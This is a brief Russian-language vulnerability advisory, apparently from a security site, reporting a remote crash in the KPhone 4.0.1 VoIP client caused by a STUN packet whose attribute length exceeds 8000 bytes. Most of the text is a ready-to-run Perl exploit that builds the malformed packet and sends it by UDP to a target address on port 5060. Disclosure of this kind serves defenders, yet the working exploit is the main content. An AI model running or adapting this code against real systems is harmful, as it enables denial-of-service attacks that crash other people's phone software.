Программа: KPhone 4.0.1 

Уязвимость обнаружена в KPhone. Удаленный пользователь может аварийно завершить работу приложения.
Удаленный пользователь может послать специально обработанный STUN пакет (с параметром attrLen более 8000 байт), чтобы аварийно завершить работу приложения целевого пользователя. 

Эксплоит: 

#!/usr/bin/perl
use IO::Socket::INET;

my $buf = join("", "\x01\x01", # BindingResponse
"\x00\x01", # MsgLength
"A"x16, # GUID
"\x00\x00", # Attribute
"\x08\x01", # AttrLength
"A"x7975 # Value
);

my $remote = IO::Socket::INET->new( Proto => 'udp',
PeerAddr => '192.168.1.49',
PeerPort => 5060);

print $remote $buf;

Оставить мнение